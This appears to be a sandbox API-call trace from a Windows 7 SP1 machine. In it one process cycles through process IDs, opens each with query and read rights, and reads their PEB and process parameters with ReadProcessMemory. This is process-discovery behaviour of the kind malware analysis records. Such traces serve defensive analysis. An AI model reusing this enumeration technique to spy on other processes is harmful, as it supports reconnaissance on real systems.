[0414.766] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x232, dwBuildNumber=0x0, dwPlatformId=0x128260, szCSDVersion="") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.766] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.792] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xab0) returned 0x24c
[0414.792] GetLastError () returned 0x0
[0414.792] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.792] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.792] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.792] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.793] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b26fa, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.794] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.795] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.795] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.795] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.796] malloc (_Size=0x74) returned 0x2c1680
[0414.796] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b2766, lpBuffer=0x2c1680, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0414.796] free (_Block=0x2c1680)
[0414.797] CloseHandle (hObject=0x24c) returned 1
[0414.798] _ui64tow (_Value=0xcb4, _Buffer="2736", _Radix=10) returned="3252"
[0414.832] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3252") returned 4
[0414.833] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.833] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.857] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xcb4) returned 0x0
[0414.857] CloseHandle (hObject=0x0) returned 0
[0414.858] _ui64tow (_Value=0xe78, _Buffer="3252", _Radix=10) returned="3704"
[0414.862] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3704") returned 4
[0414.870] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.870] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.895] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe78) returned 0x0
[0414.895] CloseHandle (hObject=0x0) returned 0
[0414.896] _ui64tow (_Value=0xf00, _Buffer="3704", _Radix=10) returned="3840"
[0414.901] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3840") returned 4
[0414.902] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.902] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.927] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf00) returned 0x0
[0414.927] CloseHandle (hObject=0x0) returned 0
[0414.928] _ui64tow (_Value=0xb60, _Buffer="3840", _Radix=10) returned="2912"
[0414.932] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2912") returned 4
[0414.934] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.934] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.955] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb60) returned 0x0
[0414.955] CloseHandle (hObject=0x0) returned 0
[0414.957] _ui64tow (_Value=0x384, _Buffer="2912", _Radix=10) returned="900"
[0414.961] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="900") returned 3
[0414.962] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.962] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.990] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x384) returned 0x24c
[0414.990] GetLastError () returned 0x0
[0414.990] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.990] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.990] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.990] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1c28b0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.991] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1c2688, lpBuffer=0x12dd100, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.992] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.993] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.993] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.993] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1c1e60, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.994] malloc (_Size=0x116) returned 0x2c3520
[0414.994] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1c26c8, lpBuffer=0x2c3520, nSize=0x114, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c3520*, lpNumberOfBytesRead=0x0) returned 1
[0414.994] free (_Block=0x2c3520)
[0414.995] CloseHandle (hObject=0x24c) returned 1
[0414.996] _ui64tow (_Value=0x424, _Buffer="900", _Radix=10) returned="1060"
[0415.001] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1060") returned 4
[0415.002] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0415.002] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0415.027] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x424) returned 0x24c
[0415.027] GetLastError () returned 0x0
[0415.027] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0415.027] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdc018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.027] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0415.028] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1f2850, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.028] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1f26c8, lpBuffer=0x12dd100, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0415.029] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0415.030] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0415.030] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdc020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.030] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1f1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0415.031] malloc (_Size=0x80) returned 0x2e3b00
[0415.031] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1f270a, lpBuffer=0x2e3b00, nSize=0x7e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3b00*, lpNumberOfBytesRead=0x0) returned 1
[0415.031] free (_Block=0x2e3b00)
[0415.032] CloseHandle (hObject=0x24c) returned 1
[0415.033] _ui64tow (_Value=0xd68, _Buffer="1060", _Radix=10) returned="3432"
[0415.038] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3432") returned 4
[0415.039] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0415.039] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0415.062] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd68) returned 0x0
[0415.062] CloseHandle (hObject=0x0) returned 0
[0415.063] _ui64tow (_Value=0x6a8, _Buffer="3432", _Radix=10) returned="1704"
[0415.070] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1704") returned 4
[0415.072] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0415.072] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0415.093] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a8) returned 0x0
[0415.093] CloseHandle (hObject=0x0) returned 0
[0415.094] _ui64tow (_Value=0x8d0, _Buffer="1704", _Radix=10) returned="2256"
[0415.099] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2256") returned 4
[0415.101] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0415.101] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0415.122] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d0) returned 0x0
[0415.123] CloseHandle (hObject=0x0) returned 0
[0415.123] _ui64tow (_Value=0xdb8, _Buffer="2256", _Radix=10) returned="3512"
[0415.128] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3512") returned 4
[0415.129] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0415.129] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0415.151] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xdb8) returned 0x24c
[0415.151] GetLastError () returned 0x0
[0415.151] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0415.151] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffd9018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.151] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0415.151] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1128c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.152] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1126ca, lpBuffer=0x12dd100, nSize=0x38, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0415.153] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0415.154] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0415.154] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffd9020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.154] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x111ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0415.155] malloc (_Size=0xc6) returned 0x2c3520
[0415.155] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x112702, lpBuffer=0x2c3520, nSize=0xc4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c3520*, lpNumberOfBytesRead=0x0) returned 1
[0415.155] free (_Block=0x2c3520)
[0415.156] CloseHandle (hObject=0x24c) returned 1
[0415.157] _ui64tow (_Value=0xc98, _Buffer="3512", _Radix=10) returned="3224"
[0415.162] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3224") returned 4
[0415.163] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0415.163] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0415.190] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc98) returned 0x24c
[0415.190] GetLastError () returned 0x0
[0415.191] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0415.191] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.191] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0415.191] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x222350, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.191] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x22215a, lpBuffer=0x12dd100, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0415.192] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0415.193] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0415.194] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.194] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x221990, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0415.194] malloc (_Size=0xf0) returned 0x2c3520
[0415.194] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x22219a, lpBuffer=0x2c3520, nSize=0xee, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c3520*, lpNumberOfBytesRead=0x0) returned 1
[0415.194] free (_Block=0x2c3520)
[0415.195] CloseHandle (hObject=0x24c) returned 1
[0415.196] _ui64tow (_Value=0xe68, _Buffer="3224", _Radix=10) returned="3688"
[0415.201] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3688") returned 4
[0415.202] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0415.202] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0415.225] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe68) returned 0x24c
[0415.225] GetLastError () returned 0x0
[0415.225] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0415.225] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdc018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.225] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0415.226] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x252820, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.226] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2526ca, lpBuffer=0x12dd100, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0415.227] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0415.228] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0415.228] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdc020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0415.228] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x251ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0415.229] malloc (_Size=0x28) returned 0x2bfe40
[0415.229] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x25270c, lpBuffer=0x2bfe40, nSize=0x26, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2bfe40*, lpNumberOfBytesRead=0x0) returned 1
[0415.229] free (_Block=0x2bfe40)
[0415.230] CloseHandle (hObject=0x24c) returned 1
[0415.230] free (_Block=0x2c9220)
[0415.230] malloc (_Size=0x48) returned 0x2bd400
[0415.230] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12dd918 | out: lpSystemTimeAsFileTime=0x12dd918*(dwLowDateTime=0xf306300, dwHighDateTime=0x1dab599))
[0415.231] SetEvent (hEvent=0x1f8) returned 1
[0415.249] RtlAllocateHeap (HeapHandle=0x120000, Flags=0x0, Size=0x4) returned 0x15da90
